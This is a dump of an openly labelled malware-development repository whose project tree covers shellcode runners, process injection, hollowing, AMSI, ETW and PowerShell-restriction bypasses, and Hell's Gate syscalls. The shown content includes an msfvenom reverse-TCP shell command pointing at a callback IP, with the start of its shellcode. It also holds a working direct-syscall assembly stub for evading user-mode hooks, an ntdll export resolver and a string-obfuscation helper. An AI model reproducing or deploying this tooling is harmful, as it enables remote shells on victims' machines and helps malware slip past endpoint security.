├── C++
├── EarlyBird
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── EarlyBird.vcxproj.filters
│ └── EarlyBird.rc
├── Thread_Context
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── Thread_Context.vcxproj.filters
│ └── Thread_Context.rc
├── Shellcode_Launcher
│ ├── rcdata1.bin
│ ├── resource.h
│ ├── Shellcode_Launcher.vcxproj.filters
│ ├── Shellcode_Launcher.cpp
│ └── Shellcode_Launcher.rc
├── AES_Process_Injection
│ ├── rcdata1.bin
│ ├── messagebox64.bin
│ ├── resource1.h
│ ├── AES_Process_Injection.vcxproj.filters
│ └── AES_Process_Injection.rc
├── RC4_SysFunc032_Encrypter
│ ├── msgbox.bin
│ ├── payload.bin
│ ├── RC4_SysFunc032_Encrypter.rc
│ ├── resource.h
│ ├── typedefs.h
│ └── RC4_SysFunc032_Encrypter.vcxproj.filters
├── ServiceShell
│ ├── shellcode.h
│ ├── ServiceShell.vcxproj.filters
│ ├── malware.h
│ └── messages.h
├── HalosGate
│ ├── hellsgate.asm
│ ├── prototypes.h
│ └── HalosGate.vcxproj.filters
├── HellsGate
│ ├── HellsGate
│ │ ├── hellsgate.asm
│ │ └── HellsGate.vcxproj.filters
│ └── HellsGate.sln
├── Timestomp
│ ├── helpers.h
│ ├── typedefs.h
│ └── Timestomp.vcxproj.filters
├── format_to_char_array.py
├── SystemFunction032_RC4
│ ├── typedefs.h
│ └── SystemFunction032_RC4.vcxproj.filters
├── API_Hooking
│ ├── Detours
│ │ ├── ToHook
│ │ │ ├── hookme.cpp
│ │ │ └── ToHook.vcxproj.filters
│ │ └── HookExe
│ │ │ ├── detours
│ │ │ └── detver.h
│ │ │ ├── HookExe.vcxproj.filters
│ │ │ └── hookintoexe.cpp
│ ├── IAT_Hooking
│ │ └── IAT_Hooking.vcxproj.filters
│ ├── Inline-Minidump
│ │ └── Inline-Minidump.vcxproj.filters
│ ├── Inline-VirtualAlloc
│ │ └── Inline-VirtualAlloc.vcxproj.filters
│ └── UnHook-Ntdll-Exec
│ │ ├── UnHook-Ntdll-Exec.vcxproj.filters
│ │ └── proto.h
├── bin2uuid.py
├── aes_encrypt_py3.py
├── Heaven's_Gate
│ ├── wow64.h
│ ├── Heaven's_Gate.vcxproj.filters
│ └── pfndef.h
├── FunctionCast
│ ├── FunctionCast.cpp
│ └── FunctionCast.vcxproj.filters
├── GA_Runner
│ └── GA_Runner.vcxproj.filters
├── SCMDelivery
│ └── SCMDelivery.vcxproj.filters
├── minidump
│ └── minidump.vcxproj.filters
├── APC_Injection
│ └── APC_Injection.vcxproj.filters
├── AlternateDataStream
│ └── AlternateDataStream.vcxproj.filters
├── ETW
│ └── ETW-Silencer
│ │ ├── ETW-Silencer.vcxproj.filters
│ │ └── ETW-Silencer.cpp
├── SC_CreateFiber
│ └── SC_CreateFiber.vcxproj.filters
├── VirtualAlloc2
│ └── VirtualAlloc2.vcxproj.filters
├── Caesar_Encrypter
│ ├── Caesar_Encrypter.vcxproj.filters
│ └── Caesar_Encrypter.cpp
├── CreateThreadPool
│ └── CreateThreadPool.vcxproj.filters
├── Process_Ninjection
│ └── Process_Ninjection.vcxproj.filters
├── HeapAlloc_ShellCRunner
│ └── HeapAlloc_ShellCRunner.vcxproj.filters
├── aes_encrypt_py2.py
├── Reflective_DLLs
│ ├── ReflectiveLoader
│ │ └── ReflectiveLoader.vcxproj.filters
│ └── ReflectiveLoader_DLL
│ │ └── ReflectiveLoader_DLL.vcxproj.filters
├── MapViewSection_Injection
│ └── MapViewSection_Injection.vcxproj.filters
├── PPID-Spoofing
│ └── PPID-Spoofing.vcxproj.filters
├── NT_Shellcoderunner
│ ├── NT_Shellcoderunner.vcxproj.filters
│ └── proto.h
└── SysWhispers
│ ├── SysWhispers.vcxproj.filters
│ └── shellcode.h
├── CSharp
├── Hollow
│ ├── hollow.exe
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DInvoke
│ ├── DInvoke_EarlyBird
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_VirtualAlloc
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_MapViewOfSection
│ │ ├── packages.config
│ │ ├── App.config
│ │ ├── Program.cs
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ ├── DInvoke_ProcessHollowing
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ │ └── AssemblyInfo.cs
│ └── DInvoke_ProcessInjection
│ │ ├── packages.config
│ │ ├── App.config
│ │ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Inject
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── AES_SCRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Inject
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── SC_UUID_Runner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Shell_Service
│ ├── App.config
│ ├── Program.cs
│ ├── Service1.Designer.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── AES_SC_Encrypter
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HeapAlloc_scRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Process_Injection
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ETW
│ └── ETW-Silencer-CSharp
│ │ ├── App.config
│ │ └── Properties
│ │ └── AssemblyInfo.cs
├── Fileless_Delivery_SMB
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Hollow_Caesar_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeBuilder_Caesar
│ ├── App.config
│ ├── Caesar_Builder.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_Caesar
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Reflective_XOR_Builder
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeBuilder_VBA_Caesar
│ ├── App.config
│ ├── SCBuilder_VBA_Caesar.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ShellcodeRunner_Caesar_ExNuma
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── EnumSystemCodePagesA_SC_Runner
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NT_ProcessInjection
│ ├── packages.config
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NT_ShellcodeRunner
│ ├── packages.config
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Linux-Post-Exploitation
│ ├── shellcode_loader.c
│ ├── xor_shellcode_loader.c
│ ├── xor_shellcode_encoder.c
│ ├── xor_mprotect_shellrunner.c
│ └── shellcode_loader_mprotect.c
├── DLL_Shellcode_Runner
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PS_Reflective_DLL_Inject
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Shellcode_Runner_Caesar
│ └── Properties
│ │ └── AssemblyInfo.cs
├── DLL_Shellcode_Runner_Caesar_ExNuma
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PS_Reflective_DLLInject_ExNuma_XOR
│ └── Properties
│ └── AssemblyInfo.cs
├── shellcodes
├── Calc
│ ├── calc-64.bin
│ ├── calc-64-thread.bin
│ ├── calc-64.txt
│ └── calc-64-thread.txt
├── MessageBox
│ ├── messagebox-64.bin
│ ├── messagebox-64-git.bin
│ ├── messagebox-64-thread.bin
│ ├── messagebox-64.txt
│ ├── messagebox-64-thread.txt
│ └── messagebox-64-git.txt
└── rc4_encrypt.py
├── ProcDump
├── ProcDump
│ ├── App.config
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── Program.cs
└── ProcDump.sln
├── PSLangBypass
├── PSLangBypass
│ ├── App.config
│ ├── packages.config
│ ├── LangBypass.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PSLangBypass_SpawnShell
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PSLangBypass_InstallUtil_Bypass
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PSLangBypass.sln
├── PrintSpooferNET
├── PrintSpooferNET
│ ├── App.config
│ └── Properties
│ │ └── AssemblyInfo.cs
└── PrintSpooferNET.sln
├── C_Headers
└── win32.h
├── Powershell_CLM_Bypass
└── PSLangBypass
│ ├── PSLangBypass
│ ├── App.config
│ ├── packages.config
│ ├── LangBypass.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
│ ├── PSLangBypass_SpawnShell
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ │ └── AssemblyInfo.cs
│ └── PSLangBypass_InstallUtil_Bypass
│ ├── App.config
│ ├── packages.config
│ └── Properties
│ └── AssemblyInfo.cs
├── Powershell_CLM_Bypass_InstallUtil
├── packages.config
├── App.config
└── Properties
│ └── AssemblyInfo.cs
├── README.md
├── PowerShell
├── ps_tochar_encrypt_string.ps1
└── amsi-bypass.ps1
└── VisualBasic
├── vba_shellcode_runner.vb
└── vba_macro_inmeminj_timer.vb
/C++/EarlyBird/rcdata1.bin:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/CSharp/Hollow/hollow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/CSharp/Hollow/hollow.exe
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/Calc/calc-64.bin
--------------------------------------------------------------------------------
/C++/Thread_Context/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/Thread_Context/rcdata1.bin
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/Shellcode_Launcher/rcdata1.bin
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64-thread.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/Calc/calc-64-thread.bin
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/rcdata1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/AES_Process_Injection/rcdata1.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/msgbox.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/msgbox.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/payload.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/payload.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64.bin
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/messagebox64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/AES_Process_Injection/messagebox64.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-git.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64-git.bin
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-thread.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/shellcodes/MessageBox/messagebox-64-thread.bin
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/maldev/main/C++/RC4_SysFunc032_Encrypter/RC4_SysFunc032_Encrypter.rc
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CSharp/Hollow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/PS_Inject/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/AES_SCRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DLL_Inject/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/SC_UUID_Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/AES_SC_Encrypter/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/HeapAlloc_scRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Process_Injection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ETW/ETW-Silencer-CSharp/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Fileless_Delivery_SMB/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/Hollow_Caesar_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_XOR_Builder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar_ExNuma/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C_Headers/win32.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include "winuser.h"
4 |
/*
 * Function-pointer type with the same parameter list and return type as
 * user32!EnumDesktopsW.
 * NOTE(review): this header only declares the type. How the pointer is
 * obtained and what is passed as lpEnumFunc is not visible here. When
 * reviewing callers, check what address ends up in lpEnumFunc, because the
 * API calls whatever it is given.
 */
typedef BOOL(WINAPI* fEnumDesktopsW)(
	IN OPTIONAL HWINSTA hwinsta,      /* window station to enumerate; optional per the annotation */
	IN DESKTOPENUMPROCW lpEnumFunc,   /* callback the API invokes for each desktop */
	IN LPARAM lParam                  /* opaque value handed through to the callback */
);
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessHollowing/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_ProcessInjection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CSharp/EnumSystemCodePagesA_SC_Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C++/ServiceShell/shellcode.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=10.129.120.41 lport=13337 -f c
4 | // Payload size: 460 bytes
5 | // Final size of c file : 1957 bytes
6 |
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "...";
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_InstallUtil_Bypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_InstallUtil_Bypass/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/C++/HalosGate/hellsgate.asm:
--------------------------------------------------------------------------------
1 | ; Hell's Gate
2 | ; Dynamic system call invocation
3 | ;
4 | ; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
5 |
.data
	; Syscall number shared by the two procedures below.
	; NOTE(review): a single process-wide slot. Callers on different threads
	; would overwrite each other's value between HellsGate and HellDescent.
	wSystemCall DWORD 000h

.code
	; HellsGate: store the syscall number received in ecx (first integer
	; argument in the Windows x64 calling convention) into wSystemCall.
	HellsGate PROC
		mov wSystemCall, 000h       ; cleared first; the next store overwrites it immediately
		mov wSystemCall, ecx
		ret
	HellsGate ENDP

	; HellDescent: issue the stored syscall number with the caller's argument
	; registers and stack left as they are.
	; Analyst note: the syscall instruction executes from this image's own
	; code section, not from ntdll.dll, so user-mode hooks placed on the ntdll
	; stubs are never reached. Telemetry that records where a syscall was
	; issued from, or call stacks with no ntdll frame, is what exposes this.
	HellDescent PROC
		mov r10, rcx                ; first argument moves to r10, as the ntdll stubs do before syscall
		mov eax, wSystemCall        ; syscall number goes in eax

		syscall
		ret
	HellDescent ENDP
end
24 |
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate/hellsgate.asm:
--------------------------------------------------------------------------------
1 | ; Hell's Gate
2 | ; Dynamic system call invocation
3 | ;
4 | ; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
5 |
.data
	; Syscall number shared by the two procedures below.
	; NOTE(review): a single process-wide slot. Callers on different threads
	; would overwrite each other's value between HellsGate and HellDescent.
	wSystemCall DWORD 000h

.code
	; HellsGate: store the syscall number received in ecx (first integer
	; argument in the Windows x64 calling convention) into wSystemCall.
	HellsGate PROC
		mov wSystemCall, 000h       ; cleared first; the next store overwrites it immediately
		mov wSystemCall, ecx
		ret
	HellsGate ENDP

	; HellDescent: issue the stored syscall number with the caller's argument
	; registers and stack left as they are.
	; Analyst note: the syscall instruction executes from this image's own
	; code section, not from ntdll.dll, so user-mode hooks placed on the ntdll
	; stubs are never reached. Telemetry that records where a syscall was
	; issued from, or call stacks with no ntdll frame, is what exposes this.
	HellDescent PROC
		mov r10, rcx                ; first argument moves to r10, as the ntdll stubs do before syscall
		mov eax, wSystemCall        ; syscall number goes in eax

		syscall
		ret
	HellDescent ENDP
end
24 |
--------------------------------------------------------------------------------
/C++/Timestomp/helpers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
5 | #define NTDLL L"ntdll.dll"
6 |
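/*
 * Resolve an export of the already-loaded ntdll.dll by name.
 *
 * FunctionName: NUL-terminated ANSI export name.
 * Returns the export's address, or NULL when FunctionName is NULL, ntdll.dll
 * is not found among the loaded modules, or the export does not exist.
 *
 * Analyst note: APIs obtained through GetProcAddress are absent from the PE
 * import table, so import-based triage will not list them. Which exports the
 * callers request is not visible from this helper.
 * NOTE(review): this is a non-inline function definition in a header, so
 * including the header from more than one translation unit would produce
 * duplicate symbols.
 */
FARPROC _GetNtApiAddress(char *FunctionName) {

	HMODULE fHandle;

	if (FunctionName == NULL) {
		return NULL;
	}

	/* NTDLL is a wide literal, so call the W variant explicitly instead of
	   the GetModuleHandle macro, which maps to the ANSI variant when UNICODE
	   is not defined. */
	fHandle = GetModuleHandleW(NTDLL);
	if (fHandle == NULL) {
		return NULL;
	}

	/* GetProcAddress already returns NULL for a missing export. */
	return GetProcAddress(fHandle, FunctionName);
}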
--------------------------------------------------------------------------------
/C++/EarlyBird/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by EarlyBird.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/CSharp/NT_ProcessInjection/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/C++/Thread_Context/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Thread_Context.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Shellcode_Launcher.rc
4 | //
5 | #define IDR_RCDATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # maldev
2 | Malware development
3 |
4 | 1. VBA Gen: [trigen](https://github.com/karttoon/trigen)
5 | 2. HTA/VBA/DOCX: [macro_pack](https://github.com/sevagas/macro_pack)
6 | 3. Helper Tools: [DidierStevensSuite](https://github.com/DidierStevens/DidierStevensSuite)
7 | 4. Binary analysis of PE: [PEStudio](https://www.winitor.com/)
8 | 5. x64dbg: https://x64dbg.com/
9 |
10 | ## PE File Structure
11 |
12 | 
13 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/resource1.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by AES_Process_Injection.rc
4 | //
5 | #define IDR_RCDATA1 103
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 104
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by RC4_SysFunc032_Encrypter.rc
4 | //
5 | #define IDR_SCODE1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/C++/format_to_char_array.py:
--------------------------------------------------------------------------------
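#!/usr/bin/env python3
"""Print a C char-array initializer for the name given on the command line.

Example: ``VirtualAlloc`` is printed as
``char strVirtualAlloc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c', 0x0};``

NOTE(review): presumably the array form is used so the name is not stored as
a quoted string literal in the program that includes it. The variable name
still contains the original text, and stack-string recovery tools handle the
character-by-character form.
"""

import sys


def toArray(PROCNAME):
    """Return ``char str<PROCNAME>[] = { 'c','h',..., 0x0};`` for PROCNAME.

    The declaration is built from the argument itself rather than from the
    module-level ``_PROCNAME``, so the function gives the right variable name
    for any input and can be called without the command-line globals.
    An empty name yields ``char str[] = { 0x0};``.
    No escaping is applied, so the input is expected to be identifier-like.
    """
    quoted = ",".join("'%s'" % ch for ch in PROCNAME)
    terminator = "0x0"
    # Only add the separator when there is at least one character before the terminator.
    elements = quoted + ", " + terminator if quoted else terminator
    return "char str%s[] = { %s};" % (PROCNAME, elements)


# Guarded so the helper can be imported without triggering the CLI path.
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("[*] Usage: ./program.py \"VirtualAlloc\"")
        sys.exit(0)

    _PROCNAME = sys.argv[1]
    print(toArray(_PROCNAME))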
--------------------------------------------------------------------------------
